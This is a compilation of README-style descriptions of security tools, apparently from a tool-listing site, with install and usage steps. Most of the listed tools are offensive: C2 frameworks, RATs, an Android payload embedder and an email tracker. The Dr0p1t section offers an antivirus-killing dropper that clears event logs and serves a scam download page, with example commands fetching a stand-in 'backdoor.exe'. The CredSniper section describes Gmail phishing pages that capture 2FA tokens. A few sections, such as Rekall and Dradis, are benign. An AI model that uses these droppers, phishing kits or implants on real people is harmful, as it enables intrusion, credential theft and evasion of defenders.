
WebDavC2 is a PoC of using the WebDAV protocol, with PROPFIND-only requests, as a C2 communication channel between an agent running on the target system and a controller acting as the actual C2 server.

Architecture
WebDavC2 is composed of:
  • a controller, written in Python, which acts as the C2 server
  • an agent, written in C#/.Net, running on the target system, delivered to the target system via various initial stagers
  • various flavors of initial stagers (created on the fly when the controller starts) used for the initial compromise of the target system

Features
WebDavC2 main features:
  • Various stagers (PowerShell one-liner, batch file, different types of MS-Office macro, JScript file) - this is not limited; you can easily come up with your own stagers, check the templates folder to get an idea
  • Pseudo-interactive shell (with environment persistency)
  • Auto start of the WebClient service, even from an unprivileged user using the 'pushd' trick

Installation & Configuration
Installation is pretty straightforward:
  • Git clone this repository:
    git clone https://github.com/Arno0x/WebDAVC2 WebDavC2
  • cd into the WebDavC2 folder:
    cd WebDavC2
  • Give the execution rights to the main script:
    chmod +x webDavC2.py
To start the controller, simply type:
./webDavC2.py

Compiling your own agent
Although it is perfectly OK to use the provided agent.exe, you can very easily compile your own executables of the agent, from the source code provided. You don't need Visual Studio installed.
  • Copy the agent/agent.cs file to a Windows machine with the .Net framework installed
  • CD into the source directory
  • Use the .Net command line C# compiler:
    • To get the standard agent executable:
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:agent.exe *.cs
    • To get the debug version:
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /define:DEBUG /out:agent_debug.exe *.cs


WebDavC2 - A WebDAV C2 Tool


Quasar is a fast and lightweight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you.

Features
  • TCP network stream (IPv4 & IPv6 support)
  • Fast network serialization (NetSerializer)
  • Compressed (QuickLZ) & Encrypted (AES-128) communication
  • Multi-Threaded
  • UPnP Support
  • No-Ip.com Support
  • Visit Website (hidden & visible)
  • Show Messagebox
  • Task Manager
  • File Manager
  • Startup Manager
  • Remote Desktop
  • Remote Webcam
  • Remote Shell
  • Download & Execute
  • Upload & Execute
  • System Information
  • Computer Commands (Restart, Shutdown, Standby)
  • Keylogger (Unicode Support)
  • Reverse Proxy (SOCKS5)
  • Password Recovery (Common Browsers and FTP Clients)
  • Registry Editor

Requirements
  • .NET Framework 4.0 Client Profile (Download)
  • Supported Operating Systems (32- and 64-bit)
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

Compiling
Open the project in Visual Studio and click build, or use one of the batch files included in the root directory.
Batch file          Description
build-debug.bat     Builds the application using the debug configuration (for testing)
build-release.bat   Builds the application using the release configuration (for publishing)

Build Client
Build configuration    Description
debug configuration    The predefined Settings.cs will be used. The client builder does not work in this configuration. You can run the client directly with the predefined settings.
release configuration  Use the client builder; otherwise it will crash.


QuasarRAT - Remote Administration Tool for Windows


Have you ever heard about trojan droppers? In short, a dropper is a type of malware that downloads other malware, and Dr0p1t gives you the chance to create a stealthy dropper that bypasses most AVs and has a lot of tricks.

Features
+ Generated executable properties:
  • The executable size is smaller compared to other droppers generated the same way.
  • Downloads an executable onto the target system and executes it silently.
  • Self-destruct function, so the dropper kills and deletes itself after finishing its work.
  • Evades disk forensics: the dropper wipes the contents of the files it creates before deleting them.
  • Clears the event log after finishing.
+ Framework properties / modules:
  • Find and kill antivirus before running the malware.
  • The ability to disable UAC.
  • The ability to run your malware as admin.
  • Full spoof by spoofing the file icon and extension to anything you want.
  • ZIP file support, so you can compress your executable to a zip file before uploading.
  • Running a custom (batch|powershell|vbs) file of your choice before running the executable
  • When running PowerShell scripts it can bypass the execution policy
  • Using UPX to compress the dropper after creating it
+ Persistence modules:
  • Adding the executable to startup after downloading it.
  • Adding the executable to the task scheduler after downloading it (UAC does not matter).
  • Adding your file to the PowerShell user profile, so your file will be downloaded and run every time powershell.exe runs if it does not already exist.

Screenshots

On Windows


On Linux (Kali linux)



On OSX
Still not fully tested! Need some contributors and testers

Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-a Add your link to powershell user profile (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--runas Bypass UAC and run your malware as admin
--spoof Spoof the final file to an extension you choose.
--zip Tell Dr0p1t that the malware in the link is compressed as zip
--upx Use UPX to compress the final file.
--nouac Try to disable UAC on victim device
-i Use icon to the final file. Check icons folder.
--noclearevent Tell the framework to not clear the event logs on target machine after finish.
--nocompile Tell the framework to not compile the final file.
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information

Examples
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x; the recommended version for Python 3 is 3.5.x. Don't use 3.6 because it's not supported yet by PyInstaller.

Needed dependencies for Linux
  • apt
  • Others will be installed from install.sh file
Note: You must have root access

Needed dependencies for windows
  • pip
  • Modules in windows_requirements.txt

Installation
There's a playlist of all official videos for installing and using Dr0p1t.
  • On Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • On Windows (after downloading the ZIP and unzipping it)
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Note: Python 2.7 does not ship with pip, so install it first using the get-pip.py script.

Tested on:
  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Work with Dr0p1t-Server
Note: The server is still in beta; it has a lot of features still to add and needs a better design [Need a designer to contribute :D]

Prerequisites
  • Stable internet connection.
  • Port 5000 not in use, and the firewall configured not to block connections to it

Installation & run server
On Linux and Windows it's the same: after installing Dr0p1t by following the steps above, install the modules in server_requirements.txt using pip:
python -m pip install -r server_requirements.txt
Now let's run our server script:
python Dr0p1t_Server.py
After running the server script, it will start listening for all connections coming to port 5000 using Flask.
To use the server from your own device, open either 127.0.0.1:5000 or [Your IP]:5000 in a browser.
To open it from other devices in the LAN, open [Your Local IP]:5000; for devices on the WAN, open [Your Global IP]:5000, but first make sure you have configured your router to forward port 5000 to you.
After opening the server page you will see a simple website with a simple design asking you for the required data (see server screenshots).
Submit the data; it will be verified through some processes, the exe file will be generated, and you will be redirected to a page showing you the scam link.
Opening the link shows a scam page to download the dropper, which by default is an Adobe Flash download page. To replace the scam page with your own, replace the content of the file "Scam.html" with yours, but keep the variables (don't remove them).

Server screenshots






Dr0p1t-Framework 1.3.2.1 - A Framework That Creates An Advanced FUD Dropper With Some Tricks


IP-Biter is an open source, easy-to-deploy tracking framework that generates highly configurable and unique tracking images and links to embed in e-mails, sites or chat systems, and visualizes, in a hacker-friendly dashboard, highly detailed reports on the tracked users who view the image or open the links.

Features
  • Highly configurable tracking image generation
  • Tracking link generation
  • Tracking hidden and not recognizable from the target's point of view
  • Integrated Dashboard
  • Self-tracking prevention
  • Possibility to stop and start the tracking at any time
  • Possibility to hide the Dashboard and protect its access with a password
  • Live tracking reports from the Dashboard
  • Tracking reports live delivered to a configurable mail address
  • Different IP analysis services
  • User-Agent analysis service
  • Integrated URL shortening service
  • AllInOne PHP file
  • No need for a Database
  • Open Source
...and many many more!
Give it a try!

Getting Started

Access the Dashboard
  1. Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
    • If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

Create a new configuration
  1. When the dashboard is opened without parameters, a new configuration is created
    • Another empty new configuration can be generated by clicking the "New" button
  2. Configure the tracking image and the advanced setting if needed
    • It is possible to leave the original image URL empty. In this case an empty image will be used.
  3. Add tracking links if needed
    • It is possible to leave the original link empty. In this case the link will return a 404 page.
  4. Save the configuration
  5. Distribute the generated image or the links to start the tracking
    • You can click the copy button and paste into an HTML rich email editor like Gmail
    • NOTE: If you open the generated image or links while the dashboard page is open and loaded in the same browser, your request will not be tracked (self-tracking prevention feature)

Load an existing configuration
  1. When the dashboard is opened with the parameter "uuid", the associated configuration is loaded
    • Another configuration can be loaded by pasting the "Track UUID" into the corresponding dashboard field and clicking the "Load" button
  2. The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

Security Notes
  • Change the folder names and the dashboard page in the configuration section in order to improve security
  • Add the following lines to the .htaccess file in order to deny access to the "configs" and "reports" folders:
DirectoryIndex ipb.php
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^(configs/|reports/) - [F]
</IfModule>

Live DEMO
Have a look at the DEMO (notifications limited to 50 mails/day, and 1h/day of downtime expected)


IP-Biter - The Hacker-friendly E-Mail Tracking Framework


Easily launch a new phishing site fully presented with SSL and capture credentials along with 2FA tokens using CredSniper. The API provides secure access to the currently captured credentials, which can be consumed by other applications using a randomly generated API token.

Benefits
  • Fully supported SSL via Let's Encrypt
  • Exact login form clones for realistic phishing
  • Any number of intermediate pages
    • (i.e. Gmail login, password and two-factor pages then a redirect)
  • Supports phishing 2FA tokens
  • API for integrating credentials into other applications
  • Easy to personalize using a templating framework

Basic Usage
usage: credsniper.py [-h] --module MODULE [--twofactor] [--port PORT] [--ssl] [--verbose] --final FINAL --hostname HOSTNAME
optional arguments:
-h, --help show this help message and exit
--module MODULE phishing module name - for example, "gmail"
--twofactor enable two-factor phishing
--port PORT listening port (default: 80/443)
--ssl use SSL via Let's Encrypt
--verbose enable verbose output
--final FINAL final url the user is redirected to after phishing is done
--hostname HOSTNAME hostname for SSL

Credentials
.cache  : Temporarily stores username/password when phishing 2FA
.sniped : Flat-file storage for captured credentials and other information

API End-point
  • View Credentials (GET) https://<phish site>/creds/view?api_token=<api token>
  • Mark Credential as Seen (GET) https://<phish site>/creds/seen/<cred_id>?api_token=<api token>
  • Update Configuration (POST) https://<phish site>/config with a JSON body such as:
{
  "enable_2fa": true,
  "module": "gmail",
  "api_token": "some-random-string"
}

Modules
All modules can be loaded by passing the --module <name> option to CredSniper. They are loaded from a directory inside /modules. CredSniper is built using Python Flask, and all the module HTML templates are rendered using Jinja2.
  • Gmail: The latest Gmail login cloned and customized to trigger/phish all forms of 2FA
    • modules/gmail/gmail.py: Main module loaded w/ --module gmail
    • modules/gmail/templates/error.html: Error page for 404's
    • modules/gmail/templates/login.html: Gmail Login Page
    • modules/gmail/templates/password.html: Gmail Password Page
    • modules/gmail/templates/authenticator.html: Google Authenticator 2FA page
    • modules/gmail/templates/sms.html: SMS 2FA page
    • modules/gmail/templates/touchscreen.html: Phone Prompt 2FA page

Installation

Ubuntu 16.04
You can install and run automatically with the following commands:
$ git clone https://github.com/ustayready/CredSniper
$ cd CredSniper
~/CredSniper$ ./install.sh
Then, to run manually use the following commands:
~/$ cd CredSniper
~/CredSniper$ source bin/activate
(CredSniper) ~/CredSniper$ python credsniper.py --help
Note that Python 3 is required.

Screenshots

Gmail Module





CredSniper - Phishing Framework which supports SSL and capture credentials with 2FA tokens


Evil-Droid is a framework that creates, generates and embeds APK payloads to penetrate Android platforms.

Screenshot:


Dependencies:
1 - metasploit-framework
2 - xterm
3 - Zenity
4 - Aapt
5 - Apktool
6 - Zipalign

Download/Config/Usage:
1 - Download the tool from github
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
2 - Set script execution permission
cd Evil-Droid
chmod +x evil-droid
3 - Run the Evil-Droid Framework:
./evil-droid
See the options below.

Video tutorial:


Evil-Droid - Framework to Create, Generate & Embed APK Payloads


CrunchRAT currently supports the following features:
  • File upload
  • File download
  • Command execution
It is currently single-threaded (only one task at a time), but multi-threading (or multi-tasking) is in the works. Additional features will be included at a later date.

Server
The server-side of the RAT uses PHP and MySQL. The server-side of the RAT has been tested and works on the following:
  • Ubuntu 15.10 (Desktop or Server edition)
  • Ubuntu 16.04 (Desktop or Server edition)
Once the latest RAT code has been downloaded, there will be three directories:
  • Client - Contains implant code (ignore for this section)
  • Server - Contains server code
  • Setup - Contains setup files

Dependencies Setup
  1. Within the Setup directory there are two dependency setup shell scripts. If you are using Ubuntu 15.10 run sh 15_10_dependencies.sh, and if you're using Ubuntu 16.04 run sh 16_04_dependencies.sh. Note: This needs to be run as root. Failure to run with root privileges will result in an error.
  2. When asked for a new MySQL root password, please choose one that is complex. This information is needed at a later step.

HTTPS Setup
  1. CrunchRAT uses a self-signed certificate to secure communication between the server and implant. Run the https_setup.sh shell script within the Setup directory to automate the HTTPS setup. Note: This needs to be run as root. Failure to run with root privileges will result in an error. When asked to fill out the certificate information (Country Name, etc.), please fill out all fields. Snort rules already exist to alert on the default dummy OpenSSL certificate values. Don't be that guy that gets flagged by not filling out this information.

Database Setup
  1. Run the database_setup.sh shell script within the Setup directory to set up the MySQL database.
  2. CrunchRAT creates a default RAT account with the admin:changeme credentials. Please log into the web end of the RAT and change the default password. Once logged into the web end of the RAT, go to Account Management--> Change Password to successfully change the default password to something more complex. Additional RAT users can be provisioned using Account Management --> Add Users.

Miscellaneous Setup
  1. Copy all files from the Server directory to the webroot.
  2. You will want to create a downloads directory as well. Note: It is absolutely critical that you don't put this folder in the webroot. I typically create this directory under /home/<USERNAME>. Make sure that www-data can access this directory with the following command: sudo chown www-data:www-data downloads. This directory will store all of the files downloaded from the infected system(s).
  3. In the webroot, open the config/config.php file. This is the main RAT configuration file. Make sure that you update all of the variables (downloadsPath, dbUser, dbPass, etc) to match your environment.

Client
CrunchRAT is written in C# for simplicity. The C# binary does not have a persistence mechanism in place, but plans to write a C++ stager are currently in the works.
Targeted Framework: .NET Framework 3.5 (enabled by default on Windows 7 systems)
  1. Create a new console project in Visual Studio
  2. Copy implant.cs code from Client directory and add it to the project.
  3. Change Output Type to Windows Application (this will hide the command window) (Project --> Properties --> Output Type).
  4. Make sure Target Framework is .NET Framework 3.5.
  5. In the code there is a variable called c2 - change this variable to the IP address or domain name of the C2 server.
  6. Compile and your implant executable is ready to run.


CrunchRAT - HTTPS-based Remote Administration Tool (RAT)


kernelpop is a framework for performing automated kernel exploit enumeration on Linux, Mac, and Windows hosts.

Requirements
python3

Currently supported CVEs:
  • CVE-2017-1000367
  • CVE-2017-1000112
  • CVE-2017-7308
  • CVE-2017-6074
  • CVE-2017-5123
  • CVE-2016-5195
  • CVE-2016-2384
  • CVE-2016-0728
  • CVE-2015-7547
  • CVE-2015-1328
  • CVE-2014-4699
  • CVE-2014-4014
  • CVE-2014-3153
  • CVE-2014-0196
  • CVE-2009-1185

Run modes

default mode
The default mode runs with the command python3 kernelpop.py. It processes information about the host kernel and compares it to the known kernel exploits available to the program, then outputs a list of potentially useful vulnerabilities and the exploits attached to them.


brute-enumeration mode
The brute-enumeration mode performs the same checks, but then goes beyond and checks the computer for exploit prerequisites to see if the operating system is set up in the required vulnerable state for successful exploitation.



input mode
The input mode allows you to perform enumeration with just the output of a uname -a command, which makes it useful as a host-side enumeration tool.



One feature currently only partially implemented is brute-exploit mode. This is set to prepare, compile, and run exploits in order to confirm an exploitable kernel. However, as of now it would only run on the box the program is executed on. Given that this is a fairly large project to bring on to someone else's computer, and makes considerable noise when compiling and checking exploit attempts, it would be poor OPSEC to use in an actual engagement. At some point in the future, I would like to integrate it into my other project pysploit for enumeration and the reckless, noisy, exploity brute-exploit mode.

Exploit sources
https://github.com/SecWiki/linux-kernel-exploits
https://www.exploit-db.com/local/
https://github.com/SecWiki/windows-kernel-exploits


Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework


A simple tool for installing pentest tools and forensic tools on Debian / Ubuntu based OS.
Tested on Linux Mint and Kali Linux.

I Want To Get This, How Do I Do It?
  • Change your terminal privileges to root mode
your@terminal:~$ sudo su
  • Then clone this repository
your@terminal:~# git clone https://github.com/Yukinoshita47/Pentest-Tools-Auto-Installer.git
  • Change into the directory
your@terminal:~# cd Pentest-Tools-Auto-Installer
  • Give it chmod access level 777
your@terminal:~# chmod 777 ptai.sh
  • Run it
your@terminal:~# ./ptai.sh
To install a tool, type the number of the tool you want to install and press Enter. To exit, type 1337 and press Enter, or simply press CTRL-C.

Video Demo
Demo Video Pentest Tools Auto Installer https://www.youtube.com/watch?v=eKrgr1gm3z8
Make Your Android For Pentesting With Gnuroot Debian And Pentest Tools Auto Installer https://youtu.be/Wdx1LSFLG5Y

List of tools
  1. Nmap[Network Scanner]
  2. Zenmap [Nmap Gui version]
  3. Wireshark [Network Sniffer]
  4. W3af [Web Vulnerability Scanner]
  5. Nikto [Web Vulnerability Scanner]
  6. Whatweb [Web Vulnerability Scanner]
  7. John [Password Cracker]
  8. PDF-Crack [PDF Password Cracker]
  9. FCrackZip [ZIP Password Cracker]
  10. Ophcrack [Password Cracker]
  11. Volatility [Digital Forensic]
  12. Digital Forensic Framework [Digital Forensic]
  13. GHex [Digital Forensic]
  14. Aircrack-Ng [Wifi Audit]
  15. Ettercap [Network Audit]
  16. Yersinia [Network Audit]
  17. Packet Sniffer / Spoofing [Network Audit]
  18. Wafw00f [Web Application Firewall Audit]
  19. SSLyze [SSL Audit]
  20. Droopescan [Wordpress, Joomla, And Other CMS Auditing]
  21. SQLMap [Automate SQL Injection Audit]
  22. SSLScan [SSL Audit]
  23. Hydra [Password Cracker]
  24. Dmitry [Intelligence Gathering]
  25. HAVP [HTTP Anti Virus Proxy]
  26. krdc [Windows Remote Desktop Connection client]
  27. Medusa [Password Cracker]

Screenshot







Pentest-Tools-Auto-Installer - A Simple Tool For Installing Pentest Tools And Forensic Tools On Debian / Ubuntu Based OS


The Rekall Framework is a completely open collection of tools, implemented in Python under the Apache and GNU General Public License, for the extraction and analysis of digital artifacts from computer systems.
The Rekall distribution is available from: http://www.rekall-forensic.com/
Rekall should run on any platform that supports Python.
Rekall supports investigations of the following 32bit and 64bit memory images:
  • Microsoft Windows XP Service Pack 2 and 3
  • Microsoft Windows 7 Service Pack 0 and 1
  • Microsoft Windows 8 and 8.1
  • Microsoft Windows 10
  • Linux Kernels 2.6.24 to 4.4.
  • OSX 10.7-10.12.x.
Rekall also provides a complete memory sample acquisition capability for all major operating systems (see the tools directory).

Quick start
Rekall is available as a Python package installable via the pip package manager. To install it, first create a virtual env, switch to it and then install rekall:
$ virtualenv  /tmp/MyEnv
New python executable in /tmp/MyEnv/bin/python
Installing setuptools, pip...done.
$ source /tmp/MyEnv/bin/activate
$ pip install --upgrade setuptools pip wheel
$ pip install rekall-agent rekall
For Windows, Rekall is also available as a self-contained installer package. Please check the download page at Rekall-Forensic.com for the most appropriate installer.
To install from this git repository you will need to use pip --editable and follow the correct order of installation (otherwise pip will pull released dependencies, which might be older):
$ virtualenv  /tmp/MyEnv
New python executable in /tmp/MyEnv/bin/python
Installing setuptools, pip...done.
$ source /tmp/MyEnv/bin/activate
$ pip install --upgrade setuptools pip wheel
$ git clone https://github.com/google/rekall.git rekall
$ pip install --editable rekall/rekall-lib
$ pip install --editable rekall/rekall-core
$ pip install --editable rekall/rekall-agent
$ pip install --editable rekall
On Windows you will need to install the Microsoft Visual C compilers for Python (for more info see this blog post: http://rekall-forensic.blogspot.ch/2015/09/installing-rekall-on-windows.html)

History
In December 2011, a new branch within the Volatility project was created to explore how to make the code base more modular, improve performance, and increase usability. The modularity allowed Volatility to be used in GRR, making memory analysis a core part of a strategy to enable remote live forensics. As a result, both GRR and Volatility would be able to use each other's strengths.
Over time this branch has become known as the "scudette" branch or the "Technology Preview" branch. It was always a goal to try to get these changes into the main Volatility code base. But, after two years of ongoing development, the "Technology Preview" was never accepted into the Volatility trunk version.
Since it seemed unlikely these changes would be incorporated in the future, it made sense to develop the Technology Preview branch as a separate project. On December 13, 2013, the former branch was forked to create a new stand-alone project named "Rekall". This new project incorporates changes made to streamline the codebase so that Rekall can be used as a library. Methods for memory acquisition and other outside contributions have also been included that were not in the Volatility codebase.
Rekall strives to advance the state of the art in memory analysis, implementing the best algorithms currently available and a complete memory acquisition and analysis solution for at least Windows, OSX and Linux.

More documentation
Further documentation is available at http://www.rekall-forensic.com/


Rekall v1.7 - Forensic and Incident Response Framework


Exploit Pack has been designed by an experienced team of software developers and exploit writers to automate processes so penetration testers can focus on what's really important: the threat. This blend of software engineers and subject matter experts provides a unique advantage by combining technical know-how with true insight into the problem set, resulting in more efficient solutions for cyber security surveillance.

Get an ISO/VM with Exploit Pack

Get an ISO or a VM with Exploit Pack already installed: Exploit Pack comes pre-installed in several Linux distributions, but our all-time favorite is BlackArch; get it here: https://blackarch.org/downloads.html

Get/Update using GIT

After you install git on your platform of choice (Windows, OSX, Linux), you can simply run the following commands. To get Exploit Pack:
$ git clone https://github.com/juansacco/exploitpack.git
To update to the latest release, navigate into the Exploit Pack folder and run this command:
$ git pull

Documentation

Please check our javadocs included under the folder with that name; also check our online guide, PDFs and the information all over the internet about this tool. Feel free to make comments, integrate with our community and have fun!

Known issues:

Using Exploit Pack could produce addiction. Prolonged periods of time using this tool could produce network mayhem or even death. In case of intoxication (using Exploit Pack under Windows) please call your doctor immediately.

Installation notes:

Windows:

Download and install Java 8 from Oracle. Depending on your platform you have to choose between Java SE 8 for 32 bits or Java 8 for 64 bits. After you have installed Java 8 on your system, get Exploit Pack from the official site, uncompress it and double-click ExploitPack.jar; if that does not work, try from a console using this command: "java -jar ExploitPack.jar"

Linux:
Under any Linux distribution that supports DEB packages (Ubuntu, Debian, Kali, etc.) you can run the following commands to install Java 8 from an official repository. Copy and paste the following into a terminal window:
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

Then, get Exploit Pack through GIT or download it from the official website. After that, run it from a terminal using the following command: "java -jar ExploitPack.jar"

OSX:

Download and install Java 8 for OSX (32/64 bits) from Oracle. After you have Java 8 installed on your Mac, download Exploit Pack, uncompress it and double-click ExploitPack.jar to run it, or from a console: "java -jar ExploitPack.jar"

BUILD OUTPUT DESCRIPTION

When you build a Java application project that has a main class, the IDE automatically copies all of the JAR files on the project's classpath to your project's dist/lib folder. The IDE also adds each of the JAR files to the Class-Path element in the application JAR file's manifest file (MANIFEST.MF).

To run the project from the command line, go to the dist folder and type the following:
java -jar "ExploitPack.jar" 
To distribute this project, zip up the dist folder (including the lib folder) and distribute the ZIP file.

Notes:

  • If two JAR files on the project classpath have the same name, only the first JAR file is copied to the lib folder.
  • Only JAR files are copied to the lib folder.
  • If the classpath contains other types of files or folders, these files (folders) are not copied.
  • If a library on the project's classpath also has a Class-Path element specified in its manifest, the content of that Class-Path element has to be on the project's runtime path.
  • To set a main class in a standard Java project, right-click the project node in the Projects window and choose Properties. Then click Run and enter the class name in the Main Class field. Alternatively, you can manually type the class name in the manifest Main-Class element.

Exploit Pack - Penetration Testing Framework


Intelligence and Reconnaissance Package/Bundle installer.
IntRec-Pack is a Bash script designed to download, install and deploy several quality OSINT, Recon and Threat Intelligence tools. Because it also manages the installation of the various dependencies of these programs, it aims to be a comprehensive assistant for setting up your intelligence gathering environment. Below is an overview of the tools and utilities it will help you set up.

+-------------------------+--------------------------------------------+
| Tool                    | Utility type and feature summary           |
+-------------------------+--------------------------------------------+
| 1. QuickScan            | Port Scanner/WHOIS/Domain Resolver         |
| 2. DNSRecon             | Advanced DNS Enumeration & Domain Utility  |
| 3. Sublist3r            | OSINT Based Subdomain Enumeration          |
| 4. TekDefense-Automator | OSINT Based IP, URL and Hash Analyzer      |
| 5. TheHarvester         | eMail, vHost, Domain and PII Enumeration   |
| 6. IOC-Parser           | Threat Intel, parses IOC data from reports |
| 7. PyParser-CVE         | Multi Source Exploit Parser/CVE Lookup     |
| 8. Mimir                | HoneyDB CLI/Threat Intelligence Utility    |
| 9. Harbinger            | Cymon.io, Virus Total, Threat Feed Parser  |
| 10. Spiderfoot          | Advanced OSINT/Reconnaissance Framework    |
+-------------------------+--------------------------------------------+
Furthermore, I have included functionality within the Bash script that allows the user to easily pull up two web based resources, namely OSINT-Framework and HoneyDB. The former is a curated list of open source intelligence tools, websites and related materials for use as a reference guide, while the latter is an OSINT aggregative threat intelligence pool that collects and organizes data provided by HoneyPy honeypots. My command line interface for HoneyDB (Mimir) is included in the selection of tools available for download with IntRec-Pack as well.

Usage
Clone the tool from the repo and make it executable like so.
git clone https://github.com/NullArray/IntRec-Pack.git
cd IntRec-Pack
chmod +x intrec.sh
After that it can be started from the command line with sudo ./intrec.sh. Upon doing so you will be presented with a menu whose options are as follows:
1) Help                  4) Specify Install Location
2) List and Install      5) Online Resources
3) Install All           6) Quit
The help option displays further usage information and general details about the tool. List and Install lists all the tools available for download/installation and lets you select the ones you would like; upon doing so each selected tool plus its dependencies will be installed in the current working directory, unless the Specify Install Location option has been used to provide a path to a custom location. Install All downloads and installs all the tools available with this script, and Online Resources opens the web applications previously mentioned.

Update
The script has been updated to version 1.0.1.

Changelog
Each installation operation now has its own function in order to make the script modular. This will also allow for the easy addition of operations that would install other/more tools in the future.
Additional checks have been added to the script to look for the presence of utilities such as wget, git and pip. This is important because some distros such as Debian and Devuan do not come with some of these utilities installed by default. Should the script find any of these utilities missing, it will attempt to automatically resolve the issue, making the script effective and compatible with most Debian based distros.
From now on IntRec-Pack will check whether it has been started with superuser privileges. Since there are a lot of sudo commands in the script, this prevents the user from running into trouble halfway through the execution.


IntRec-Pack - Intelligence and Reconnaissance Package/Bundle installer


Wfuzz has been created to facilitate the task of web application assessments and is based on a simple concept: it replaces any reference to the FUZZ keyword with the value of a given payload.
A payload in Wfuzz is a source of data.
This simple concept allows any input to be injected into any field of an HTTP request, allowing you to perform complex web security tests against different web application components such as parameters, authentication, forms, directories/files, headers, etc.
Wfuzz is more than a web content scanner:
  • Wfuzz can help you secure your web applications by finding and exploiting web application vulnerabilities. Wfuzz's web application vulnerability scanner is supported by plugins.
  • Wfuzz is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Building plugins is simple and takes little more than a few minutes.
  • Wfuzz exposes a simple language interface to previous HTTP requests/responses performed using Wfuzz or other tools, such as Burp. This allows you to perform manual and semi-automatic tests with full context and understanding of your actions, without relying on a web application scanner's underlying implementation.

It was created to facilitate the task of web application assessments; it's a tool by pentesters for pentesters ;)

Installation
To install Wfuzz, simply use pip:
pip install wfuzz

Documentation
Documentation is available at http://wfuzz.readthedocs.io


Wfuzz - Web Application Fuzzer


This is the initial release of FruityC2 (alpha version). It can be installed on any Linux system, but the installation scripts are made for Debian based systems. There are a lot of functionalities that will be included in future releases, and probably a lot of code will be changed, but this version is enough to show FruityC2.

FruityC2 is a post-exploitation (and open source) framework based on the deployment of agents on compromised machines. Agents are managed from a web interface under the control of an operator.

It works as a command-and-control model and is language and system agnostic. New agents are being developed to expand the capabilities and options for FruityC2.

A web client is used to interact with the FruityC2 API in a client/server mode. The client is a single web page divided into 5 sections: Interact, Listener, Payload, Delivery, Config. These options provide full control and access to the functions included in FruityC2 to create, deliver and interact with a functioning C2 capability.

During the development of the initial alpha version, I divided the efforts between the client and the server, but mainly on the client.
The next steps are to improve the Stager and Agent, add more functionalities and commands, and I will start developing new stagers and agents for other OS systems.
Note: The current Stager and Agent can be only executed on Windows (powershell), but this will be extended in future releases to other systems and file types.

Install

Method 1: Standard installer (Server)
script: install.sh
Note: you need to download the master.zip file or to clone the repository (FruityC2).

Method 2: Standalone installer (Server and Client)
script: install-standalone.sh
  • You need Debian (or based) installed (or a Live CD version) to use this script.
  • Download install-standalone.sh from https://github.com/xtr4nge/FruityC2/
  • Run install-standalone.sh (it will download and install all the dependencies, FruityC2 and FruityC2-Client)
  • Done.

FruityC2 Server
Edit the file config/settings.conf and add the IP address (from which FruityC2-Client will be used) to the allow list in the [source] / [[control]] section:
[source]
[[control]]
allow = '127.0.0.1', '10.0.0.1', 'fruityc2-client-ip'

Then run
./FruityC2.py
Note: To use FruityC2 you need FruityC2-Client. You don't need a webserver to use FruityC2-Client, just open index.html.

FruityC2-Client Wiki
https://github.com/xtr4nge/FruityC2-Client/wiki

Extra Scripts

download-modules-extra.sh
This script can be used to download extra modules from the Empire, PowerSploit, PowerShell-AD-Recon and Nishang projects.

reset.sh
This script can be used to back up the data, logs and config files and then reset the server data.


FruityC2 - Post-Exploitation Tool to Manage Compromised Machines from a Web Interface


Dradis is an open-source collaboration framework, tailored to InfoSec teams.

Goals
  • Share the information effectively.
  • Easy to use and easy to adopt. Otherwise it would present little benefit over other systems.
  • Flexible: with a powerful and simple extensions interface.
  • Small and portable. You should be able to use it while on site (no outside connectivity). It should be OS independent (no two testers use the same OS).

Some of the features:

Editions
There are two editions of Dradis Framework:
  • Dradis Framework Community Edition (CE): open-source and available freely under the GPLv2 license.
  • Dradis Framework Professional Edition (Pro): includes extra features that are more useful for organizations dealing with bigger teams and multiple projects at a time. To use Pro and get official support please become a subscriber.

Getting started: Community Edition

Git release (recommended)
$ git clone https://github.com/dradis/dradis-ce.git
$ cd dradis-ce/
$ ruby bin/setup
$ bundle exec rails server
You can browse to the app at http://localhost:3000/

Using Vagrant
If you'd like to use Dradis in Vagrant, you can use the included Vagrantfile.
# Clone the repo
git clone https://github.com/dradis/dradis-ce.git

# install/start the vagrant box
vagrant up
# ssh into the box
vagrant ssh

